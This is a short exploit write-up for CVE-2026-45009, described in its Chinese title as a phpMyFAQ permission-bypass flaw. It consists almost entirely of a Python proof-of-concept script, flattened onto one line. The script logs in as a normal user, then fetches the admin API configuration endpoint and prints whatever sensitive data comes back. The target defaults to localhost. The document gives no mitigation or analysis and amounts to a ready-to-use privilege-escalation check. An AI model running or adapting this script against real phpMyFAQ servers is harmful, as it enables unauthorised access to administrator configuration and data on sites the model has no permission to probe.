CVE-2026-45009 phpMyFAQ权限绕过漏洞

import requests def check_poc(target_url, username, password): """ Proof of Concept for CVE-2026-45009 Demonstrates access to admin API endpoints as a regular user. """ session = requests.Session() # 1. Login as a normal user login_endpoint = f"{target_url}/index.php" login_payload = { "faqusername": username, "faqpassword": password } try: print("[+] Attempting to login as normal user...") response = session.post(login_endpoint, data=login_payload) if response.status_code != 200: print("[-] Login failed") return # 2. Access sensitive Admin API endpoint (e.g., configuration) # This endpoint typically requires admin privileges api_endpoint = f"{target_url}/admin/api/configuration" print(f"[+] Accessing protected endpoint: {api_endpoint}") api_response = session.get(api_endpoint) if api_response.status_code == 200: print("[+] Vulnerability confirmed! Sensitive data leaked:") print(api_response.text) else: print(f"[-] Access denied. Status code: {api_response.status_code}") except Exception as e: print(f"[-] An error occurred: {str(e)}") if __name__ == "__main__": # Replace with actual target and credentials target = "http://localhost/phpmyfaq" user = "user" pwd = "password" check_poc(target, user, pwd)